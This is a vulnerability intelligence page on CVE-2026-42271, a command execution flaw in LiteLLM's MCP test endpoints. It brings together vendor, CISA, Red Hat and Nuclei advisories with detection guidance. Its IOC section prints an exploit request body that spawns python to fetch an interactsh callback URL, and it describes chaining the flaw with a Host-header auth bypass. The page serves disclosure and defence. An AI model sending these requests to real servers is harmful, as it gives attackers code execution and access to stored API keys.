CVE-2026-42271
published 2026-05-08CVE-2026-42271: LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to…
PriorityP194high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-06-22
Exploited in the wild
EPSS
60.78%
98.3th percentile
LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of low-privilege internal-user keys — could therefore run arbitrary commands on the host. This issue has been patched in version 1.83.7.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ansible-automation-platform-26 | lightspeed-chatbot-rhel9 | — | — |
| ansible-automation-platform-27 | lightspeed-chatbot-rhel9 | — | — |
| berriai | litellm | — | — |
| exploit-intelligence-tech-preview | vulnerability-analysis-rhel9 | — | — |
| litellm | litellm | >= 1.74.2 < 1.83.7 | 1.83.7 |
| litellm | litellm | >= 1.74.2 < 1.83.7 | 1.83.7 |
| rhoai | odh-llama-stack-core-rhel9 | — | — |
| rhoai | odh-mlflow-rhel9 | — | — |
| rhoai | odh-trustyai-garak-lls-provider-dsp-rhel9 | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command{"transport":"stdio","command":"python","args":["-c","import urllib.request;urllib.request.urlopen('https://{{interactsh-url}}')"]}
sigma↗
Review logs for unusual Host header activity and subprocess execution events
- →Detect POST requests to the vulnerable MCP test endpoints /mcp-rest/test/connection and /mcp-rest/test/tools/list; these should be blocked or alerted on at the reverse proxy or API gateway layer. ↗
- →Look for malformed/adversarial Host header values (e.g., 'a/?x=') in HTTP requests to LiteLLM, indicative of the Starlette BadHost bypass (CVE-2026-48710) being chained to achieve unauthenticated RCE. ↗
- →Monitor for unexpected subprocess spawning from the LiteLLM proxy process, especially processes launched with 'command', 'args', and 'env' fields sourced from HTTP request bodies (stdio transport abuse). ↗
- →Alert on HTTP 200 responses from /mcp-rest/test/connection that contain the string 'Failed to connect to MCP server', which indicates the endpoint was reached and attempted execution.
- →Detect requests to /mcp-rest/test/connection or /mcp-rest/test/tools/list that include a JSON body with a 'transport' field set to 'stdio' combined with 'command' and 'args' fields, as this is the exploitation pattern.
- ·The two vulnerable endpoints (/mcp-rest/test/connection and /mcp-rest/test/tools/list) are only present in LiteLLM versions >= 1.74.2 and < 1.83.7. Deployments outside this range are not affected. ↗
- ·The exploit chain to unauthenticated RCE requires Starlette <= 1.0.0 to be present in the dependency tree. Without the Starlette BadHost bypass (CVE-2026-48710), exploitation still requires a valid (even low-privilege) proxy API key. ↗
- ·After patching to version 1.83.7, both test endpoints now require the PROXY_ADMIN role, so low-privilege internal-user keys can no longer trigger them. ↗
- ·Successful exploitation grants the attacker the full privileges of the LiteLLM proxy process, which may include access to model provider credentials, API keys, and secrets stored by the proxy. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.7HIGHCVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck8.8HIGH
cisa8.8HIGH
vendor_redhat8.8HIGH
GHSA
LiteLLM: Authenticated command execution via MCP stdio test endpoints
ghsa·2026-04-25
CVE-2026-42271 [HIGH] CWE-78 LiteLLM: Authenticated command execution via MCP stdio test endpoints
LiteLLM: Authenticated command execution via MCP stdio test endpoints
### Impact
Two endpoints used to preview an MCP server before saving it — `POST /mcp-rest/test/connection` and `POST /mcp-rest/test/tools/list` — accepted a full server configuration in the request body, including the `command`, `args`, and `env` fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process.
The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of low-privilege internal-user keys — could therefore run arbitrary commands on the host.
### Patches
Fixed in **`1.83.7`**. Both test e
VulnCheck
BerriAI LiteLLM Command Injection Vulnerability
vulncheck·2026·CVSS 8.8
CVE-2026-42271 [HIGH] CWE-78 BerriAI LiteLLM Command Injection Vulnerability
BerriAI LiteLLM Command Injection Vulnerability
BerriAI LiteLLM contains a command injection vulnerability that could allow any authenticated user, including holders of low-privilege internal-user keys, to run arbitrary commands on the host.
Affected: BerriAI LiteLLM
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Exploit PoC: https://vulncheck.com/xdb/9d2bfb7ce628
Remediation Due: 2026-06-22
CISA
BerriAI LiteLLM Command Injection Vulnerability
cisa·2026-06-08·CVSS 8.8
CVE-2026-42271 [HIGH] CWE-78 BerriAI LiteLLM Command Injection Vulnerability
Vulnerability: BerriAI LiteLLM Command Injection Vulnerability
Affected: BerriAI LiteLLM
BerriAI LiteLLM contains a command injection vulnerability that could allow any authenticated user, including holders of low-privilege internal-user keys, to run arbitrary commands on the host.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability affects a common open-source component, third-party library, or a protocol used by different products. Please check with specific vendors for information on patching status. For more information, please see: https://github.com/BerriAI/litellm/security/advisories/GHSA-v4p8-mg3p-g94g ; https://github.com/B
Red Hat
litellm: LiteLLM: Authenticated command execution via MCP stdio test endpoints
vendor_redhat·2026-05-08·CVSS 8.8
CVE-2026-42271 [HIGH] CWE-78 litellm: LiteLLM: Authenticated command execution via MCP stdio test endpoints
litellm: LiteLLM: Authenticated command execution via MCP stdio test endpoints
LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of low-privilege int
No detection rules found.
Nuclei
LiteLLM - Command Injection
nuclei·CVSS 8.7
CVE-2026-42271 [HIGH] LiteLLM - Command Injection
LiteLLM - Command Injection
A critical unauthenticated remote code execution vulnerability exists in LiteLLM due to improper input handling in the MCP stdio test endpoint. An attacker can send a specially crafted request to the `/mcp-rest/test/connection` endpoint with controlled parameters, resulting in arbitrary command execution on the server. When combined with an authentication bypass technique—such as the Starlette BadHost flaw (CVE-2026-48710)—an unauthenticated attacker can exploit the chain to execute commands as the server process. Exploitation allows an attacker to spawn processes with the privileges of the LiteLLM server, potentially leading to complete compromise of the host.
Template:
id: CVE-2026-42271
info:
name: LiteLLM - Command Injection
author: ritikchaddha
severity
Bugzilla
CVE-2026-42271 litellm: LiteLLM: Authenticated command execution via MCP stdio test endpoints
bugzilla·2026-05-08·CVSS 8.8
CVE-2026-42271 [HIGH] CVE-2026-42271 litellm: LiteLLM: Authenticated command execution via MCP stdio test endpoints
CVE-2026-42271 litellm: LiteLLM: Authenticated command execution via MCP stdio test endpoints
LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format. From version 1.74.2 to before version 1.83.7, two endpoints used to preview an MCP server before saving it — POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list — accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check. Any authenticated user — including holders of lo
Hackernews
LiteLLM Flaw CVE-2026-42271 Exploited in the Wild, Chains to Unauthenticated RCE
blogs_hackernews·2026-06-09·CVSS 8.8
CVE-2026-42271 [HIGH] LiteLLM Flaw CVE-2026-42271 Exploited in the Wild, Chains to Unauthenticated RCE
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## LiteLLM Flaw CVE-2026-42271 Exploited in the Wild, Chains to Unauthenticated RCE
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a high-severity flaw impacting BerriAI LiteLLM to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation.
The vulnerability, tracked as CVE-2026-42271 (CVSS score: 8.7), is a command injection vulnerability that could allow any authenticated user to run arbitrary commands on the host.
It affects the following version of the LiteLLM Python package -
>= 1.74.2
< 1.83.7
"Two endpoints used to preview an MCP server before saving
2026-05-08
Published
2026-06-08
Added to CISA KEV
Exploited in the wild